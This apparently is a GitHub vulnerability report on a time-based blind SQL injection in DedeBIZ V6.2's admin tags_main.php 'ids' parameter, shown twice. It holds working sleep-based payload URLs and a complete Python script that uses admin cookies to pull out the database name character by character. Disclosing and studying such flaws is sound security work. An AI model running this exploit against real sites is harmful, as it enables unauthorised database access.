You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Cause of vulnerability]
in /src/admin/tags_main.php,there is possibility of sql injection is the sql statement "$query = "DELETE FROM #@__tagindex WHERE id IN ($stringids)";"
It should be noted that the sql statement here requires data to exist in the queried data table for sql injection to exist. The data table here stores the characteristic characters of the articles in the site, so articles need to exist in the site for this data table to have data.
[Vulnerability demonstration]
If it is an original site, in order to make the data table mentioned above have data, you need to perform the following steps (usually the data tables of sites on the Internet have data, because the site you are using will definitely have articles. , there will also be article key characters):
1.Create article categories to create articles later in http://localhost:8086/admin/catalog_add.php?listtype=all. Write test character "test" in "中文名称" to create article categories.
2.create articles in http://localhost:8086/admin/article_add.php,choose "test" in "发布栏目" and write "test_article" in "文档标题" and write "a" in "标签" so that you can create article.
3.After the above steps,it is able to perform sql injection
First ,fetch your cookies in order to make sure the sql injection can be performed successfully.
4.Because the payload here is quite special, sqlmap takes more time to complete the injection, so a python script is used to inject it.
Write a python script to perform blind SQL injection. The python script is given below (remember to change the url and cookies to yours)
python script is here:https://github.com/yhy217/dedebiz--vul/blob/main/time_injection.zip
or you can use the python code
import requests
import time
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
database = ''
length=0
for l in range(1,20):
Url = 'http://localhost:8086/admin/tags_main.php?action=delete&ids=if(length(database())>{0},666,sleep(3))'
#replace with your url, here keep the '666' in payload if(length(database())>{0},666,sleep(3)) in order not to delete the tags
UrlFormat = Url.format(l)
start_time0 = time.time()
cookies = {
"dede_csrf_token": "89fbfaabddf9fbc14a2fc148606818ff",
"dede_csrf_token__ckMd5": "0fe49927c42c854a",
"DedeLoginTime": "1695266280",
"DedeLoginTime__ckMd5": "29e695100a28380a",
"DedeStUUID": "7bf8a37cf0ee8",
"DedeStUUID__ckMd5": "da06278b80034043",
"DedeUserID": "1",
"DedeUserID__ckMd5": "b55b6fbf67e0257e",
"ENV_GOBACK_URL": "/admin/content_list.php",
"PHPSESSID": "3r1etgf62m34mf1kqqt8r3pfi6",
}#replace with your cookies here
requests.get(UrlFormat,headers=headers,cookies=cookies)
print(time.time()-start_time0)
if time.time() - start_time0 > 2:
print('database length is ' + str(l))
length=l;
break
else:
pass
for i in range(1,length+1):
for char in chars:
charAscii = ord(char)
url = 'http://localhost:8086/admin/tags_main.php?action=delete&ids=if(ascii(substr(database(),{0},1))>{1},666,sleep(3))'
# replace with your url, here keep the '666' in payload if(length(database())>{0},666,sleep(3)) in order not to delete the tags
urlformat = url.format(i,charAscii)
start_time = time.time()
cookies = {
"dede_csrf_token": "89fbfaabddf9fbc14a2fc148606818ff",
"dede_csrf_token__ckMd5": "0fe49927c42c854a",
"DedeLoginTime": "1695266280",
"DedeLoginTime__ckMd5": "29e695100a28380a",
"DedeStUUID": "7bf8a37cf0ee8",
"DedeStUUID__ckMd5": "da06278b80034043",
"DedeUserID": "1",
"DedeUserID__ckMd5": "b55b6fbf67e0257e",
"ENV_GOBACK_URL": "/admin/content_list.php",
"PHPSESSID": "3r1etgf62m34mf1kqqt8r3pfi6",
}#replace with your cookies here
requests.get(urlformat,headers=headers,cookies=cookies)
if time.time() - start_time > 2:
database+=char
print('database: ',database)
break
else:
pass
print('database is ' + database)
5.successfully obtained the current database name using python script
thanks for reading so much.it is the first time for me to write so much about sql injection.
The text was updated successfully, but these errors were encountered:
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/tags_main.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/tags_main.php
Parameter: ids
[Attack Type]
Remote
[Cause of vulnerability]
![image](https://private-user-images.githubusercontent.com/128808033/269465520-74750ad6-5cc9-422c-be9d-b9388c180023.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxMzU5MzMsIm5iZiI6MTcyMjEzNTYzMywicGF0aCI6Ii8xMjg4MDgwMzMvMjY5NDY1NTIwLTc0NzUwYWQ2LTVjYzktNDIyYy1iZTlkLWI5Mzg4YzE4MDAyMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQwMzAwMzNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01NzY2ZmJjMjc3ODQwYWE0NGJhMTlmNDk3Y2RmZTg0YTRkOTRiYWU4NzJkNGIyMTU0MWI4ZTUwZThkMzJkMjFjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.qkLXFeuLCNMpsvPDttvU-IzaeOaWk1V7yA7CEpUjJvE)
in /src/admin/tags_main.php,there is possibility of sql injection is the sql statement "$query = "DELETE FROM
#@__tagindex
WHERE id IN ($stringids)";"$stringids is assigned by $ids, and $ids receives the parameter value in the request http://localhost:8086/admin/tags_main.php?action=delete&ids=(select sleep(2)).Therefore, the value of $ids can be constructed to perform time blind injection.
It should be noted that the sql statement here requires data to exist in the queried data table for sql injection to exist. The data table here stores the characteristic characters of the articles in the site, so articles need to exist in the site for this data table to have data.
[Vulnerability demonstration]
![image](https://private-user-images.githubusercontent.com/128808033/269472324-1631d044-a832-49d9-a08c-3a3bf5457aaa.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxMzU5MzMsIm5iZiI6MTcyMjEzNTYzMywicGF0aCI6Ii8xMjg4MDgwMzMvMjY5NDcyMzI0LTE2MzFkMDQ0LWE4MzItNDlkOS1hMDhjLTNhM2JmNTQ1N2FhYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQwMzAwMzNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iYWE1Y2M4MjJlMWI2YzZjZmE4MTE4Zjk3MzgwMzYxODg3OTcyZmNmNGQ2NWYxMjRiNzJkYjMyOGZlMTIwYWQ0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.xWjA_QJkWi4wKp93NqTEEX5NmDZrzcI8qqr1o70IDko)
If it is an original site, in order to make the data table mentioned above have data, you need to perform the following steps (usually the data tables of sites on the Internet have data, because the site you are using will definitely have articles. , there will also be article key characters):
1.Create article categories to create articles later in http://localhost:8086/admin/catalog_add.php?listtype=all. Write test character "test" in "中文名称" to create article categories.
2.create articles in http://localhost:8086/admin/article_add.php,choose "test" in "发布栏目" and write "test_article" in "文档标题" and write "a" in "标签" so that you can create article.
![image](https://private-user-images.githubusercontent.com/128808033/269473651-a0bf6c36-b382-4b31-abb2-b372379d0d7d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxMzU5MzMsIm5iZiI6MTcyMjEzNTYzMywicGF0aCI6Ii8xMjg4MDgwMzMvMjY5NDczNjUxLWEwYmY2YzM2LWIzODItNGIzMS1hYmIyLWIzNzIzNzlkMGQ3ZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQwMzAwMzNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZDYyNmE2Mjc3MWI3YTFlOGQyZDFmN2IyNjdkNDdlZmI2NTgzMTUyZmY2OGY3OTM1MDU0NDk5MjJmZDUxYTIwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.5ckQJcH-Tl7i0RDXt7ZTSL0sX8lHxLTxrD-XvsWwpVs)
3.After the above steps,it is able to perform sql injection
First ,fetch your cookies in order to make sure the sql injection can be performed successfully.
payload: http://localhost:8086/admin/tags_main.php?action=delete&ids=if(length(database())>0,sleep(3),666)
Second ,access http://localhost:8086/admin/tags_main.php?action=delete&ids=if(length(database())>0,sleep(3),666)
you will find that there is truely delay when accessing
4.Because the payload here is quite special, sqlmap takes more time to complete the injection, so a python script is used to inject it.
Write a python script to perform blind SQL injection. The python script is given below (remember to change the url and cookies to yours)
python script is here:https://github.com/yhy217/dedebiz--vul/blob/main/time_injection.zip
or you can use the python code
5.successfully obtained the current database name using python script
![image](https://private-user-images.githubusercontent.com/128808033/269477989-9d34449c-ce8a-4ca3-9cf0-6ba745e5bec2.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxMzU5MzMsIm5iZiI6MTcyMjEzNTYzMywicGF0aCI6Ii8xMjg4MDgwMzMvMjY5NDc3OTg5LTlkMzQ0NDljLWNlOGEtNGNhMy05Y2YwLTZiYTc0NWU1YmVjMi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQwMzAwMzNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01NmYzOWEzMTQ0ODNiNjEwNjc2MjNlYzI2Y2JiMzBmOTNlYjU1ZDNkNTQxNmNjZjc0YjViZWYzOWRiY2I4OWVhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.wBSPT73dfNpCs1_HcSasBX3PiGwsaGY6BgwMm98-hvk)
thanks for reading so much.it is the first time for me to write so much about sql injection.
The text was updated successfully, but these errors were encountered: